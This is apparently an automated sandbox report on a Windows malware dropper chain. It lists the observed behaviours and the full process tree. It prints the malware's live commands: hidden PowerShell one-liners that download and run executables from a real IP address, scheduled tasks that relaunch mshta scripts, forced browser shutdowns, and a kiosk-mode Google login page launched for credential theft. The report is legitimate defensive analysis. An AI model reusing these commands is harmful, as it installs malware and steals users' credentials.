Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1548	schtasks.exe
4792	schtasks.exe
4084	schtasks.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
2576	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
2576	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
2016	skotes.exe
2016	skotes.exe
2964	ebp51gY.exe
2964	ebp51gY.exe
676	ftS1RPn.exe
676	ftS1RPn.exe
2964	ebp51gY.exe
2964	ebp51gY.exe
2964	ebp51gY.exe
2964	ebp51gY.exe
1896	8QQOJj9.exe
1896	8QQOJj9.exe
1896	8QQOJj9.exe
1896	8QQOJj9.exe
1896	8QQOJj9.exe
1896	8QQOJj9.exe
4304	uXivbut.exe
4304	uXivbut.exe
3728	Gxtuum.exe
3728	Gxtuum.exe
4976	skotes.exe
4976	skotes.exe
1156	archive.exe
1156	archive.exe
4772	Gxtuum.exe
4772	Gxtuum.exe
2524	dca61186a4.exe
2524	dca61186a4.exe
2524	dca61186a4.exe
944	powershell.exe
944	powershell.exe
944	powershell.exe
3504	powershell.exe
3504	powershell.exe
3504	powershell.exe
4364	78869dfa0e.exe
4364	78869dfa0e.exe
2196	Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE
2196	Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE
4856	powershell.exe
4856	powershell.exe
4364	78869dfa0e.exe
4364	78869dfa0e.exe
4364	78869dfa0e.exe
4364	78869dfa0e.exe
4856	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2524	dca61186a4.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	3864	AddInProcess32.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3132	42ade0d979.exe
3132	42ade0d979.exe
3132	42ade0d979.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3132	42ade0d979.exe
3132	42ade0d979.exe
3132	42ade0d979.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2576 wrote to memory of 2016	2576	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe	88
PID 2576 wrote to memory of 2016	2576	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe	88
PID 2576 wrote to memory of 2016	2576	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe	88
PID 2016 wrote to memory of 2964	2016	skotes.exe	91
PID 2016 wrote to memory of 2964	2016	skotes.exe	91
PID 2016 wrote to memory of 2964	2016	skotes.exe	91
PID 2016 wrote to memory of 676	2016	skotes.exe	92
PID 2016 wrote to memory of 676	2016	skotes.exe	92
PID 2016 wrote to memory of 676	2016	skotes.exe	92
PID 2016 wrote to memory of 1896	2016	skotes.exe	94
PID 2016 wrote to memory of 1896	2016	skotes.exe	94
PID 2016 wrote to memory of 1896	2016	skotes.exe	94
PID 2016 wrote to memory of 4304	2016	skotes.exe	95
PID 2016 wrote to memory of 4304	2016	skotes.exe	95
PID 2016 wrote to memory of 4304	2016	skotes.exe	95
PID 4304 wrote to memory of 3728	4304	uXivbut.exe	96
PID 4304 wrote to memory of 3728	4304	uXivbut.exe	96
PID 4304 wrote to memory of 3728	4304	uXivbut.exe	96
PID 3728 wrote to memory of 1156	3728	Gxtuum.exe	101
PID 3728 wrote to memory of 1156	3728	Gxtuum.exe	101
PID 3728 wrote to memory of 1156	3728	Gxtuum.exe	101
PID 2016 wrote to memory of 2524	2016	skotes.exe	103
PID 2016 wrote to memory of 2524	2016	skotes.exe	103
PID 2016 wrote to memory of 2524	2016	skotes.exe	103
PID 2524 wrote to memory of 3864	2524	dca61186a4.exe	104
PID 2524 wrote to memory of 3864	2524	dca61186a4.exe	104
PID 2524 wrote to memory of 3864	2524	dca61186a4.exe	104
PID 2524 wrote to memory of 3864	2524	dca61186a4.exe	104
PID 2524 wrote to memory of 3864	2524	dca61186a4.exe	104
PID 2524 wrote to memory of 3864	2524	dca61186a4.exe	104
PID 2524 wrote to memory of 3864	2524	dca61186a4.exe	104
PID 2524 wrote to memory of 3864	2524	dca61186a4.exe	104
PID 2016 wrote to memory of 4104	2016	skotes.exe	105
PID 2016 wrote to memory of 4104	2016	skotes.exe	105
PID 2016 wrote to memory of 4104	2016	skotes.exe	105
PID 4104 wrote to memory of 2380	4104	DF9PCFR.exe	106
PID 4104 wrote to memory of 2380	4104	DF9PCFR.exe	106
PID 4104 wrote to memory of 2380	4104	DF9PCFR.exe	106
PID 4104 wrote to memory of 2380	4104	DF9PCFR.exe	106
PID 4104 wrote to memory of 2380	4104	DF9PCFR.exe	106
PID 4104 wrote to memory of 2380	4104	DF9PCFR.exe	106
PID 2016 wrote to memory of 1640	2016	skotes.exe	107
PID 2016 wrote to memory of 1640	2016	skotes.exe	107
PID 1640 wrote to memory of 992	1640	HrCoDRP.exe	108
PID 1640 wrote to memory of 992	1640	HrCoDRP.exe	108
PID 2016 wrote to memory of 3132	2016	skotes.exe	109
PID 2016 wrote to memory of 3132	2016	skotes.exe	109
PID 2016 wrote to memory of 3132	2016	skotes.exe	109
PID 3132 wrote to memory of 228	3132	42ade0d979.exe	110
PID 3132 wrote to memory of 228	3132	42ade0d979.exe	110
PID 3132 wrote to memory of 228	3132	42ade0d979.exe	110
PID 3132 wrote to memory of 2768	3132	42ade0d979.exe	111
PID 3132 wrote to memory of 2768	3132	42ade0d979.exe	111
PID 3132 wrote to memory of 2768	3132	42ade0d979.exe	111
PID 228 wrote to memory of 1548	228	cmd.exe	113
PID 228 wrote to memory of 1548	228	cmd.exe	113
PID 228 wrote to memory of 1548	228	cmd.exe	113
PID 2768 wrote to memory of 944	2768	mshta.exe	114
PID 2768 wrote to memory of 944	2768	mshta.exe	114
PID 2768 wrote to memory of 944	2768	mshta.exe	114
PID 2016 wrote to memory of 4752	2016	skotes.exe	116
PID 2016 wrote to memory of 4752	2016	skotes.exe	116
PID 2016 wrote to memory of 4752	2016	skotes.exe	116
PID 4752 wrote to memory of 4148	4752	cmd.exe	118

C:\Users\Admin\AppData\Local\Temp\6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
"C:\Users\Admin\AppData\Local\Temp\6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2576
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe
    "C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2964
- - C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe
    "C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:676
- - C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
    "C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
    "C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4304
  - - C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3728
    - - C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1156
- - C:\Users\Admin\AppData\Local\Temp\1090673001\dca61186a4.exe
    "C:\Users\Admin\AppData\Local\Temp\1090673001\dca61186a4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3864
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        
        PID:4784
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        
        PID:3532
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:4732
- - C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
    "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4104
  - - C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
      "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
      4⤵
      PID:2380
- - C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe
    "C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1640_133846639473563567\continental.exe
      C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      PID:992
- - C:\Users\Admin\AppData\Local\Temp\1090975101\42ade0d979.exe
    "C:\Users\Admin\AppData\Local\Temp\1090975101\42ade0d979.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn IwmDCmaNdBR /tr "mshta C:\Users\Admin\AppData\Local\Temp\Jhc3g1Fwg.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:228
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn IwmDCmaNdBR /tr "mshta C:\Users\Admin\AppData\Local\Temp\Jhc3g1Fwg.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1548
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\Jhc3g1Fwg.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2768
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:944
      - C:\Users\Admin\AppData\Local\Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE
        
        "C:\Users\Admin\AppData\Local\Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1090976021\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090976021\am_no.cmd" any_word
      4⤵
      System Location Discovery: System Language Discovery
      PID:4148
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:824
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2200
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3504
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4668
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4856
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:2468
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2648
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "9GdsHmaQSnw" /tr "mshta \"C:\Temp\mDZ5Vaf1v.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4792
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\mDZ5Vaf1v.hta"
        5⤵
        
        PID:2652
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3212
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        
        PID:4728
- - C:\Users\Admin\AppData\Local\Temp\1091044001\78869dfa0e.exe
    "C:\Users\Admin\AppData\Local\Temp\1091044001\78869dfa0e.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4364
- - C:\Users\Admin\AppData\Local\Temp\1091045001\8f1e635c48.exe
    "C:\Users\Admin\AppData\Local\Temp\1091045001\8f1e635c48.exe"
    3⤵
    PID:3068
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      PID:556
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa6ed6cc40,0x7ffa6ed6cc4c,0x7ffa6ed6cc58
        5⤵
        
        PID:2988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:4364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6e8f46f8,0x7ffa6e8f4708,0x7ffa6e8f4718
        5⤵
        
        PID:4504
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 2452
      4⤵
      Program crash
      PID:6064
- - C:\Users\Admin\AppData\Local\Temp\1091046001\185b388925.exe
    "C:\Users\Admin\AppData\Local\Temp\1091046001\185b388925.exe"
    3⤵
    PID:4396
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:8
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:3532
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:2652
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:2776
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:1016
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:3816
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:2892
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27269 -prefMapSize 242931 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f7eff1f-ec4b-4561-8bf1-a5e559d438af} 2892 "\\.\pipe\gecko-crash-server-pipe.2892" gpu
        6⤵
        
        PID:4820
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 28189 -prefMapSize 242931 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0afedf5-6a5c-429c-b3fc-7bc4bae5bf38} 2892 "\\.\pipe\gecko-crash-server-pipe.2892" socket
        6⤵
        
        PID:712
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2816 -childID 1 -isForBrowser -prefsHandle 2812 -prefMapHandle 2808 -prefsLen 22827 -prefMapSize 242931 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c2ea72e-47e4-4055-b741-2d522fc235fc} 2892 "\\.\pipe\gecko-crash-server-pipe.2892" tab
        6⤵
        
        PID:1412
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3040 -childID 2 -isForBrowser -prefsHandle 3688 -prefMapHandle 3684 -prefsLen 33196 -prefMapSize 242931 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {890fd773-f029-4e50-bd36-c32581fd7afc} 2892 "\\.\pipe\gecko-crash-server-pipe.2892" tab
        6⤵
        
        PID:4300
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1720 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 1420 -prefMapHandle 2872 -prefsLen 33318 -prefMapSize 242931 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ab081a3-85bf-4c16-b29c-607c19bc0748} 2892 "\\.\pipe\gecko-crash-server-pipe.2892" utility
        6⤵
        
        PID:5328
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5248 -childID 3 -isForBrowser -prefsHandle 5216 -prefMapHandle 5160 -prefsLen 27474 -prefMapSize 242931 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e71d14bc-693d-40e6-97c8-0cafb93e5540} 2892 "\\.\pipe\gecko-crash-server-pipe.2892" tab
        6⤵
        
        PID:5572
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5268 -childID 4 -isForBrowser -prefsHandle 5316 -prefMapHandle 5320 -prefsLen 33339 -prefMapSize 242931 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ca78ec0-e744-4dbf-940a-ae88f0c216cb} 2892 "\\.\pipe\gecko-crash-server-pipe.2892" tab
        6⤵
        
        PID:5584
- - C:\Users\Admin\AppData\Local\Temp\1091047001\e7b263f29d.exe
    "C:\Users\Admin\AppData\Local\Temp\1091047001\e7b263f29d.exe"
    3⤵
    PID:4484
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 2iXDDmajZXT /tr "mshta C:\Users\Admin\AppData\Local\Temp\n1aRoObaB.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      PID:4528
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 2iXDDmajZXT /tr "mshta C:\Users\Admin\AppData\Local\Temp\n1aRoObaB.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4084
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\n1aRoObaB.hta
      4⤵
      PID:3584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'A94K2COTLLTO9NQLARVJ4QVKVADR5OIH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4320
      - C:\Users\Admin\AppData\Local\TempA94K2COTLLTO9NQLARVJ4QVKVADR5OIH.EXE
        
        "C:\Users\Admin\AppData\Local\TempA94K2COTLLTO9NQLARVJ4QVKVADR5OIH.EXE"
        6⤵
        
        PID:6076
- - C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe
    "C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"
    3⤵
    PID:1264
- - C:\Users\Admin\AppData\Local\Temp\1091050001\d90fb93121.exe
    "C:\Users\Admin\AppData\Local\Temp\1091050001\d90fb93121.exe"
    3⤵
    PID:6488
- - C:\Users\Admin\AppData\Local\Temp\1091051001\1dc9d14eff.exe
    "C:\Users\Admin\AppData\Local\Temp\1091051001\1dc9d14eff.exe"
    3⤵
    PID:5500
- - C:\Users\Admin\AppData\Local\Temp\1091052001\7tzlyz8.exe
    "C:\Users\Admin\AppData\Local\Temp\1091052001\7tzlyz8.exe"
    3⤵
    PID:5204
- - C:\Users\Admin\AppData\Local\Temp\1091053001\HrCoDRP.exe
    "C:\Users\Admin\AppData\Local\Temp\1091053001\HrCoDRP.exe"
    3⤵
    PID:6868
  - - C:\Users\Admin\AppData\Local\Temp\onefile_6868_133846639901892269\continental.exe
      C:\Users\Admin\AppData\Local\Temp\1091053001\HrCoDRP.exe
      4⤵
      PID:6596
- - C:\Users\Admin\AppData\Local\Temp\1091054001\d4cb40e231.exe
    "C:\Users\Admin\AppData\Local\Temp\1091054001\d4cb40e231.exe"
    3⤵
    PID:4076
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:7012
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:6504
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
